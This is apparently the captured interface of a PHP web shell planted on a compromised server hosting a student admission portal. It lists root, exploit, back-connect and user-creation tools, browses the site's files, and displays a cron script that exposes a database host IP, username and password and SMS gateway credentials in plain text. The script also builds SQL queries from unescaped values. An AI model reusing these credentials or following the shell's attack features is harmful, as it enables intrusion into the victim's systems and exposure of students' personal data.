Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.217.14.208
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
gach /
adm /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
certificates
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
razorpay
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tcpdf
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
MainPage.html
41.1
KB
-rwxr-xr-x
MainPage_dev.html
0
B
-rwxr-xr-x
MainPage_with_values.html
40.77
KB
-rwxr-xr-x
Notification.pdf
41.04
KB
-rwxr-xr-x
Registrationpage.html
5.39
KB
-rwxr-xr-x
Reprint.html
6.8
KB
-rwxr-xr-x
admission_sms_push.php
2.42
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.51
KB
-rwxr-xr-x
cronjob_sendsms.php
2.52
KB
-rwxr-xr-x
database.php
442
B
-rwxr-xr-x
direct-signin.php
886
B
-rw-rw-r--
feestr.pdf
33.42
KB
-rwxr-xr-x
forgot-password.php
2.19
KB
-rwxr-xr-x
forgotPassword.html
3.84
KB
-rwxr-xr-x
index.html
9.57
KB
-rwxr-xr-x
index_1.html
130
B
-rwxr-xr-x
instruction.html
10.31
KB
-rwxr-xr-x
instruction_10092018.html
8.37
KB
-rwxr-xr-x
instruction_24092018.html
9.08
KB
-rwxr-xr-x
instruction_regn.html
5.07
KB
-rwxr-xr-x
login.php
294
B
-rwxr-xr-x
registration.html
12.77
KB
-rwxr-xr-x
upload.php
393
B
-rwxr-xr-x
upload1.php
389
B
-rwxr-xr-x
upload_file.php
718
B
-rwxr-xr-x
verify.php
7.28
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cronjob_sendsms.php
<?php //lib16107 lib16103 ini_set('display_errors', 'on'); include("sendsmsapi.php"); ini_set('memory_limit','900M'); ini_set('max_execution_time',0); $univcode = trim($_GET['funivcode']); // $univcode = '041'; if($univcode == '') { die(); } //connect to database $servername = "97.74.228.93"; $username = "logisys3_logu"; $password = "Logisys@2106"; $conn = new mysqli($servername,$username,$password); if(!$conn) { die("Connection failed: " . mysqli_connect_error()); } $commondb = "logisys3_comexam"; $query = "select funivcode, fregno, fenttype, fmobileno as mobileno, concat(fmessage,' Sent Time: ',time(now())) as fmessage from {$commondb}.sendsms where ifnull(fstatus, 'F') = 'F' and fenttype in('AI','AC') and funivcode in ('041', '042') and fmobileno is not null"; $result = mysqli_query($conn,$query); $count = mysqli_num_rows($result); $username = 'logisyhttp'; $password = 'Logis986'; $from = 'UNISOL'; $category = ''; if($count >0) { $i = 0; while($row = mysqli_fetch_assoc($result)) { $to = $row['mobileno']; $text = $row['fmessage']; $smsresp = sendsmaapi($username,$password,$from,$to,$text,$category); $rgInsert[] = "('".$row['funivcode']."','".$row['fregno']."','{$to}','0','{$smsresp}','".$row['fenttype']."','T', DATE_FORMAT(NOW(),'%Y-%m-%d'), DATE_FORMAT(NOW(),'%T'))"; $rgTrimedMobs[$i] = $to; if($i == 50) { $strInsertQuery = "insert into {$commondb}.smslog(funivcode, fregno,fmobileno, freasoncode, fguid, fenttype, fstatus,fackdate, facktime) values".implode(',',$rgInsert); //var_dump($strInsertQuery); $result1 = mysqli_query($conn,$strInsertQuery); $srtImplodedMobs = implode("','",$rgTrimedMobs); $strUpdateQuery = "update {$commondb}.sendsms set fstatus = 'T' where fenttype in('AI','AC') and fmobileno in ('{$srtImplodedMobs}')"; //var_dump($strUpdateQuery); $result2 = mysqli_query($conn,$strUpdateQuery); unset($rgInsert); $rgInsert = array(); unset($rgTrimedMobs); $rgTrimedMobs = array(); $i = 0; } $i++; } $strInsertQuery = "insert into {$commondb}.smslog(funivcode,fregno,fmobileno, freasoncode, fguid, fenttype, fstatus,fackdate, facktime) values".implode(',',$rgInsert); //var_dump($strInsertQuery); $result1 = mysqli_query($conn,$strInsertQuery); $srtImplodedMobs = implode("','",$rgTrimedMobs); $strUpdateQuery = "update {$commondb}.sendsms set fstatus = 'T' where fenttype in('AI','AC') and fmobileno in ('{$srtImplodedMobs}')"; //var_dump($strUpdateQuery); $result2 = mysqli_query($conn,$strUpdateQuery); echo "SMS Sent"; } ?>
Close